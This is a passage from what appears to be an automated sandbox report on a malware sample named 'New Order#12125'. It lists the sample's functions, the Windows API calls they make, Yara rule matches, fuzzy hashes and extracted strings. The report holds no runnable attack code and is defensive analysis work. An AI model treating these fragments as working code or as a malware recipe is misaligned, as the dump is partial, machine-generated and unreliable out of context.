2 call 2bcf03 168->171 177 2a903b-2a903e 171->177 177->73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "$"
                                                                        • API String ID: 0-3758156766
                                                                        • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction ID: 597b00814f423d6f858bd2cc59178251c85a144ff2369c413704465c10160402
                                                                        • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction Fuzzy Hash: C5F182B1D1021AAFDF24DF64CC85AEEB7B9AF45300F1481AAE509A7241DF709E55CFA0
                                                                        Function 00291A99 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 291a99-291a9b 179 291b18 178->179 180 291a9d-291aad 178->180 181 291b1c 179->181 182 291aae-291ac1 180->182 181->182 183 291b1d-291b1f 181->183 184 291ac5 182->184 187 291b49 183->187 188 291b21-291b30 183->188 185 291a87-291a94 184->185 186 291ac6-291ae3 184->186 191 291a77-291a80 185->191 186->184 189 291ae5-291aea 186->189 190 291b80-291b83 187->190 192 291b31 188->192 193 291aec 189->193 194 291af4-291b02 189->194 195 291b84-291b95 190->195 196 291a6b-291a74 191->196 197 291a82-291a83 191->197 192->181 198 291b33-291b36 192->198 199 291aee-291af0 193->199 200 291a84-291a85 193->200 201 291b05-291b07 194->201 202 291bf9-291c00 195->202 203 291b97-291b9f 195->203 196->191 197->200 204 291b37-291b45 198->204 199->194 200->185 201->195 207 291b09-291b0d 201->207 205 291c32-291c3a 202->205 206 291c02-291c05 202->206 203->192 211 291ba1-291ba2 203->211 204->187 212 291bc7-291bcb 205->212 208 291c06-291c31 206->208 207->179 208->205 213 291bcc-291bd9 211->213 214 291ba4 211->214 212->213 219 291b6b-291b7c 213->219 220 291bdb-291bdc 213->220 214->204 215 291ba6-291ba7 214->215 217 291ba9-291bc6 215->217 218 291b56 215->218 217->212 218->201 221 291b58-291b69 218->221 219->190 220->208 222 291bde-291be4 220->222 221->219 222->202
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gfff$qi
                                                                        • API String ID: 0-3408824469
                                                                        • Opcode ID: 7157ea8d65efb368e5ae19fbb7d5438eca739491720f8a1a21171d374dfd349c
                                                                        • Instruction ID: 3098aa2d72323d695cd9d41d4e09c8e5000f06ab8e1f237282f52287ec362a40
                                                                        • Opcode Fuzzy Hash: 7157ea8d65efb368e5ae19fbb7d5438eca739491720f8a1a21171d374dfd349c
                                                                        • Instruction Fuzzy Hash: EFB1B1726652570FCF1ACE2E8C522A87B56EB52314F1852BED852CF2D3E1108D36C7C1
                                                                        Function 002A7CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 251 2a7ca3-2a7ccc call 2bf7e3 254 2a7cce-2a7cd1 251->254 255 2a7cd2-2a7ce0 call 2bfde3 251->255 258 2a7ce2-2a7ced call 2c0083 255->258 259 2a7cf0-2a7d01 call 2be283 255->259 258->259 264 2a7d1a-2a7d1d 259->264 265 2a7d03-2a7d17 LdrLoadDll 259->265 265->264
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 002A7D15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction ID: f7eaf8ff4e582baf085a3d275d358a229a0a1d522827b78d47167e743cc90cea
                                                                        • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction Fuzzy Hash: 01011EB5D1420EABDF10DBA4DD42FDEB778AF54304F0041A6E90897241FA31EB688B91
                                                                        Function 002BCB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 271 2bcb43-2bcb7f call 294903 call 2bdd73 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 002BCB7A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction ID: 004464765ef5c5be968dee328f557d98c24f4e6691ac0d318c40080eb47d9ce7
                                                                        • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction Fuzzy Hash: BDE04672210644BBE620EA59DC02FDBB76CDFC5750F008555FA58A7242C670B9218BE0
                                                                        Function 01542B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 285 1542b60-1542b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                                        • Instruction ID: c3f1ab954ab0669fce2e637d38d7f7984cb6b429c2f6d73565d12027c64adf95
                                                                        • Opcode Fuzzy Hash: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                                        • Instruction Fuzzy Hash: 8490026120240003424571598424616404AA7E0211B59C422F5014990DC56589916625
                                                                        Function 01542DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                                        • Instruction ID: ae7835c0abc37fb4ca6e2ae1ab23abc5050d91e321a25ad2815719b8653d95ae
                                                                        • Opcode Fuzzy Hash: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                                        • Instruction Fuzzy Hash: AD90023120140413D251715985147070049A7D0251F99C813B4424958DD6968A52A621
                                                                        Function 01542C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 286 1542c70-1542c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                                        • Instruction ID: 7108b7be424c5f57785ed805eebff95032cac6fd076012b76cc38fab18b49d38
                                                                        • Opcode Fuzzy Hash: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                                        • Instruction Fuzzy Hash: A390023120148802D2507159C41474A0045A7D0311F5DC812B8424A58DC6D589917621
                                                                        Function 015435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                                        • Instruction ID: 9a862733508b2763e59152d80e44f63bdb7c8e0fb002ac27219981ccee086967
                                                                        • Opcode Fuzzy Hash: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                                        • Instruction Fuzzy Hash: 1C90023160550402D240715985247061045A7D0211F69C812B4424968DC7D58A516AA2
                                                                        Function 002A44C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 002A456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction ID: 7957e80ecebd91af813e848b80dca83b4e37129d648dc252c86f2ed3c3c904b5
                                                                        • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction Fuzzy Hash: 911127B2D141497BDB10EBA08C81EEE7F7CEF41794F4440A9F954AB102D774CA168FA0
                                                                        Function 002A44F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 002A456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction ID: 9038d518ebea99682e3ed67b36cfc42c659df444d197bedfdc288626cc02ef99
                                                                        • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction Fuzzy Hash: 5B01D2B2D0024CBBDB10BBE08C82DEF7B7CDF41794F048065FA14A7101D6648E168FA1
                                                                        Function 002BCEB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 41 2bceb3-2bcef4 call 294903 call 2bdd73 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 002BCEEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: i*
                                                                        • API String ID: 3298025750-2343931300
                                                                        • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction ID: b08f34db9ead4480954957ed0bea15e9736b871570c73024f566395d4ab33ce1
                                                                        • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction Fuzzy Hash: A0E06DB2604604BBD610EE58EC41FDB37ACEFC8750F004008F918A7242D771B9218BB4
                                                                        Function 002BCE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 266 2bce63-2bcea7 call 294903 call 2bdd73 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,002AEA4E,?,?,00000000,?,002AEA4E,?,?,?), ref: 002BCEA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction ID: 39831f1e265dfecd99ca0bf45e456463c1223ad1bb4c71bae97decb8e7b0411b
                                                                        • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction Fuzzy Hash: 72E06DB2214244BBD614EE58DC42EEB77ACEF88710F004049FA08A7242D770B921CBB4
                                                                        Function 002BCF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 276 2bcf03-2bcf38 call 294903 call 2bdd73 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 002BCF33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                        • Instruction ID: 5fad932d035d5076196dfded21a73ad54800ed0d1d64e56363383e5f45d8af03
                                                                        • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                        • Instruction Fuzzy Hash: FCE08C32200A147BD620FA59DC01FDB77ACDFC5750F108095FA08A7286D6B0B9218BF4
                                                                        Function 01542C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 281 1542c0a-1542c0f 282 1542c11-1542c18 281->282 283 1542c1f-1542c26 LdrInitializeThunk 281->283
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                                        • Instruction ID: ee161e0a19588cc4218815fdf9027514e25112931c4ada40987799a252a33b72
                                                                        • Opcode Fuzzy Hash: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                                        • Instruction Fuzzy Hash: 66B09B719015D5D6DB51E765960871B794077D0715F19C462F2030A41F4778C1D1E675

                                                                        Non-executed Functions

                                                                        Function 01582349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                                        • Instruction ID: 5a8dfbf41ccc595c0b8f08617180b114c57483327efd21739ac4049b39385c11
                                                                        • Opcode Fuzzy Hash: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                                        • Instruction Fuzzy Hash: 5A928171608742AFE721EF19C840B6BBBE8BF84754F04491DFA95EB290D770E845CB92
                                                                        Function 014F68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-3089669407
                                                                        • Opcode ID: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                                        • Instruction ID: 341b5b38adf29099abd8d53176634371f583929e5de7d7bdb84700803ef57b60
                                                                        • Opcode Fuzzy Hash: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                                        • Instruction Fuzzy Hash: 478175B2D12619BF9B11EBD4DDD4EDE77BDAB14714716042BBA10FB110E630DE089BA0
                                                                        Function 015A5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • @, xrefs: 015A6277
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 015A5A84
                                                                        • @, xrefs: 015A63A0
                                                                        • PreferredUILanguages, xrefs: 015A63D1
                                                                        • @, xrefs: 015A61B0
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015A5FE1
                                                                        • InstallLanguageFallback, xrefs: 015A6050
                                                                        • LanguageConfiguration, xrefs: 015A6420
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015A635D
                                                                        • @, xrefs: 015A6027
                                                                        • PreferredUILanguagesPending, xrefs: 015A61D2
                                                                        • @, xrefs: 015A647A
                                                                        • Control Panel\Desktop, xrefs: 015A615E
                                                                        • LanguageConfigurationPending, xrefs: 015A6221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1325123933
                                                                        • Opcode ID: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                                        • Instruction ID: 92652317e06a6436740ff66b0027bb9de31356c5c73a0b6957046de2471d773c
                                                                        • Opcode Fuzzy Hash: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                                        • Instruction Fuzzy Hash: D37248715583429FD721DF28C850A6FBBE9FBC8704F84492DFA859B250E770D905CBA2
                                                                        Function 01538620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0157540A, 01575496, 01575519
                                                                        • Critical section address, xrefs: 01575425, 015754BC, 01575534
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01575543
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754E2
                                                                        • Thread identifier, xrefs: 0157553A
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754CE
                                                                        • 8, xrefs: 015752E3
                                                                        • Critical section address., xrefs: 01575502
                                                                        • undeleted critical section in freed memory, xrefs: 0157542B
                                                                        • Address of the debug info found in the active list., xrefs: 015754AE, 015754FA
                                                                        • corrupted critical section, xrefs: 015754C2
                                                                        • double initialized or corrupted critical section, xrefs: 01575508
                                                                        • Invalid debug info address of this critical section, xrefs: 015754B6
                                                                        • Critical section debug info address, xrefs: 0157541F, 0157552E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: 81e4c570c5dcadbc1737c544cab22534a73b78efc856fc9258f3f0aa529df355
                                                                        • Instruction ID: 87440633e8317efde9384203e2b18e5c817e71e76020c61e1f29df8975873ca2
                                                                        • Opcode Fuzzy Hash: 81e4c570c5dcadbc1737c544cab22534a73b78efc856fc9258f3f0aa529df355
                                                                        • Instruction Fuzzy Hash: B8818C71A40359AFDF21CF99D845BAEBBF5FB48704F24411AF504BB2A0E371A945CB60
                                                                        Function 015329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01572498
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01572506
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01572624
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015724C0
                                                                        • @, xrefs: 0157259B
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015722E4
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01572602
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015725EB
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0157261F
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01572409
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01572412
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
